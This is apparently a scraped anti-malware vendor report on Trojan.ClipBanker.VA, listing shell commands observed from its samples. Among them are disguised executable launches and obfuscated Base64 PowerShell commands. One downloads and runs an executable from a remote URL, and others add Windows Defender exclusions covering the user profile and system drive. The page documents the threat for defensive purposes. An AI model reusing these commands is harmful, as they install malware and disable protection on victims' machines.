									open C:\Users\Qjkbpfsl\AppData\Local\Temp\IMMORTAL FREE1.2.exe


									open Xeno.exe


									open C:\Users\Wzrhnfss\AppData\Local\Temp\xenoUIConfig.exe


									C:\Users\Wzrhnfss\AppData\Local\Temp\LicenseValidator\main.exe (NULL)


									open powershell -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBVAHMAZQByAHMASgBvAGgAbgBEAG8AZQBzAC8AagBlAHIAawAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAHYAMAAvAFcAaQBuAFMAeABTAC4AZQB4AGUAJwAsACAAPAAjAHUAYgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB4AGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZABxAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdwBpAG4AcwB4AHMALgBlAHgAZQAnACkAKQA8ACMAaABqAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcgBsAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHAAYwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuAHMAeABzAC4AZQB4AGUAJwApADwAIwBxAHMAYgAjAD4A"


									open C:\Users\Rzihfwse\AppData\Local\Temp\refrech3.exe


									open C:\Users\Onrykltk\AppData\Local\Temp\Vison FREE.exe


									open C:\Users\Jjgqlhjt\AppData\Local\Temp\Securyt.exe


									open C:\Users\Nflhzcog\AppData\Local\Temp\Rayd Cheat.exe


									open powershell -EncodedCommand "PAAjAHYAeABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbAB3ACMAPgA="


									open C:\Users\Lgcrrysk\AppData\Roaming\svchost.exe


									open C:\Users\Lgcrrysk\AppData\Roaming\subdir.exe


									open C:\WINDOWS\VISON FREE.exe


									open C:\Users\Tjgnojwc\AppData\Local\Temp\IMX FREE.exe


									open C:\Users\Kwrxiugf\AppData\Local\Temp\IMMORTAL.exe


									open powershell -EncodedCommand "PAAjAHoAcwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZwB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZgBjACMAPgA="


									open C:\Users\Xcqunmbw\AppData\Roaming\subdir.exe


									open C:\Users\Xcqunmbw\AppData\Roaming\system.exe

EnigmaSoft’s Payment Processor Digital River GmbH Filing for Bankruptcy Does Not Impact SpyHunter Customers’ Anti-Malware Protection

Search

Change Region

Trojan.ClipBanker.VA

Threat Scorecard

EnigmaSoft Threat Scorecard

Analysis Report

General information

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

Windows PE Version Information

Windows PE Version Information

File Traits

Block Information

Block Information

Visual Map

Similar Families

Similar Families

Files Modified

Files Modified

Registry Modifications

Registry Modifications

Windows API Usage

Windows API Usage

Shell Command Execution

Shell Command Execution

Submit Comment

Trending

Trojan.Kryptik.JUD

Trojan.Tofsee.P

Panneyess.com

Most Viewed

Pornktube.porn

How To Fix 'Printer Driver is Unavailable' Error

Discord Shows Black Screen when Sharing Screen